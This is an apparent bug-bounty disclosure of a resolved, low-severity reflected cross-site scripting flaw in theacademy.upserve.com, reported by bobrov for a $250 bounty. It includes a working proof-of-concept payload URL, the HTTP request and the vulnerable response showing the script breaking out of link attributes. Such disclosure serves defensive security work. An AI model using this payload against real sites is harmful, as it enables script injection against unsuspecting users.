[theacademy.upserve.com] Reflected XSS Query-String
Low
U
Upserve
Submitted None
Team Summary
Official summary from Upserve
The reporter discovered an unauthenticated reflected cross-site scripting vulnerability in theacademy.upserve.com by setting the XSS payload as a GET parameter.
Actions:
Reported by
bobrov
Vulnerability Details
Technical details and impact analysis
**Steps To Reproduce:**
Open URL in FireFox:
```
https://theacademy.upserve.com/roles/?%22%3E%3Cscript//src=data:,alert(location)//
```
**HTTP Request**
```http
GET /roles/?%22%3E%3Cscript//src=data:,alert(location)// HTTP/1.1
Host: theacademy.upserve.com
```
**HTTP Response**
```html
<a class="category dropdown-item name-sort sorting-desc" href="/roles/?"><script//src=data:,alert(location)//&orderby=name&order=DESC">Name</a>
<a class="category dropdown-item views-sort " href="/roles/?"><script//src=data:,alert(location)//&orderby=views&order=DESC" >Views</a>
<a class="category dropdown-item duration-sort " href="/roles/?"><script//src=data:,alert(location)//&orderby=duration&order=DESC">Duration</a>
```
## Impact
Reflected XSS
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$250.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected